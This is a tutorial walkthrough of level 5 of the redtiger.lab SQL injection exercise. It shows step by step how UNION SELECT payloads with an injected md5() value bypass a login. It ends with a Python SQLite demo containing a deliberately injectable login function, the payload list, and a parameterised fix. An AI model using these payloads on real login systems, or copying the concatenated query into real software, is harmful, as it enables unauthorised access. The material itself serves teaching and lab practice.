SQL INJECTION (redtiger.lab) - Part 4
So far we have completed levels 1 to 4 of the redtiger lab and learned several ways of performing SQL injection to extract information.
In this part we will complete level 5 of the redtiger lab.
In level 5 we have to bypass the login system. The hints given are that the injection is not blind (which means database errors are shown to us) and that the password is stored as an MD5 hash. The hint calls it "md5-encrypted", but MD5 is a hash, not encryption: the application must be hashing the password we submit and comparing it with the stored hash.
If we enter a random username and password it says no user found, so we must first bypass the username check.
Since this is not blind SQL injection, let's try to generate an error by entering a single quote ' in the username and password fields.
Here we get the error:
mysql_num_rows() expects parameter 1 to be resource, boolean given
This PHP warning means that mysql_query() returned false instead of a result set, i.e. our quote broke the syntax of the query. So the username is placed into the SQL query without any escaping and our single quote closed the string literal; that is what we will exploit. So
let's try to bypass the username check with the query
username: hey' union select 1 #
and password: hey
Here instead of hey you can use anything; it doesn't matter, as long as it is a username that does not exist, so that the only row the query returns is the one our UNION adds.
This still produces an error, because the two SELECTs of a UNION must return the same number of columns and we only guessed one. So let's try again with two columns in the select statement.
username: hey' union select 1,2 #
and password: hey
Now it says login failed, which means the username check is bypassed (the query returned a row, so mysql_num_rows() is no longer zero) but the password check is not: the application hashes the password we typed and compares it with the password column of the row it got back, and our row contains 2 there.
So to bypass the password check, let's look at the hint again. It says the password is stored as an MD5 hash.
From above we know the query selects two columns, and presumably one of them is the username and the other the password. To determine which column is the password, let's try the following query.
username: hey' union select md5('hey'),2 #
and password: hey
Here the string inside md5() and the password we submit must be the same, so that the MD5 the application computes from our password equals the value we injected.
The result of this query is login failed (as shown in fig 4).
From this we know that the application does not read the password from column 1; since there are only two columns, the password must be the second column. So let's modify our query accordingly.
username: hey' union select 1,md5('hey') #
and password: hey
BINGO!!! We have successfully bypassed the login system. Note what made this work: the password comparison happens in application code against whatever row the query returns, so once we control that row we control the hash it is compared with. A parameterised query, where the username is bound as data instead of being concatenated into the SQL, would leave our UNION no way to add a row.
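The whole level-5 walkthrough above, reproduced as an added example that is not code from redtiger.lab: an in-memory SQLite stand-in for the lab's MySQL backend, a login function that mirrors the vulnerable logic (username concatenated into the query, password hashed and compared in application code against the returned row), and a parameterised version for contrast. The table and column names, the seeded account and its password are assumptions; SQLite has no md5() function, so one is registered to mimic MySQL's, and MySQL's `#` comment is replaced by `-- `, which SQLite understands.

```python
import hashlib
import sqlite3

# Constructed sample data, not the lab's real table: one account whose password
# is stored as an MD5 hex digest, as the level-5 hint says.
SEED_USERS = [("admin", hashlib.md5(b"correct horse").hexdigest())]


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the lab's MySQL backend (table/column names assumed)."""
    conn = sqlite3.connect(":memory:")
    # SQLite has no md5(); register one so MySQL-style md5('hey') works inside injected SQL.
    conn.create_function("md5", 1, lambda s: hashlib.md5(str(s).encode()).hexdigest())
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SEED_USERS)
    return conn


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str) -> str:
    """Mimics the level-5 logic: the username is concatenated straight into the
    query, and the password is checked afterwards in application code against
    the 'password' column of whatever row came back.
    Returns one of: 'sql error', 'no user', 'login failed', 'logged in'."""
    sql = f"SELECT username, password FROM users WHERE username='{username}'"  # deliberately injectable
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.OperationalError:
        # Broken syntax or a UNION column-count mismatch: the PHP original shows
        # this as the mysql_num_rows() "boolean given" warning.
        return "sql error"
    if not rows:
        return "no user"
    _, stored_hash = rows[0]
    if hashlib.md5(password.encode()).hexdigest() == stored_hash:
        return "logged in"
    return "login failed"


def safe_login(conn: sqlite3.Connection, username: str, password: str) -> str:
    """Same check with a parameterised query: the username is bound as data,
    so a UNION inside it can never add a row."""
    rows = conn.execute(
        "SELECT username, password FROM users WHERE username=?", (username,)
    ).fetchall()
    if not rows:
        return "no user"
    _, stored_hash = rows[0]
    return "logged in" if hashlib.md5(password.encode()).hexdigest() == stored_hash else "login failed"


# The level-5 payloads in the order the walkthrough tries them. SQLite does not
# accept MySQL's '#' comment, so '-- ' is used to swallow the trailing quote.
PAYLOADS = [
    ("'", "hey"),                                    # provoke the error
    ("hey' UNION SELECT 1 -- ", "hey"),              # wrong column count, still an error
    ("hey' UNION SELECT 1,2 -- ", "hey"),            # row returned, password check fails
    ("hey' UNION SELECT md5('hey'),2 -- ", "hey"),   # hash in column 1: still fails
    ("hey' UNION SELECT 1,md5('hey') -- ", "hey"),   # hash in column 2: logged in
]


def run_walkthrough(conn: sqlite3.Connection) -> list:
    """Returns the outcome of each payload against the vulnerable login."""
    return [vulnerable_login(conn, u, p) for u, p in PAYLOADS]


if __name__ == "__main__":
    db = make_db()
    for (u, _), outcome in zip(PAYLOADS, run_walkthrough(db)):
        print(f"{outcome:13}  username={u!r}")
    print("parameterised:", safe_login(db, PAYLOADS[-1][0], "hey"))
```

Running it prints "sql error" for the first two payloads, "login failed" for the next two and "logged in" for the last, matching the walkthrough; the same final payload against safe_login() yields "no user", because the injected text is just a username that does not exist.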
Link to part 5: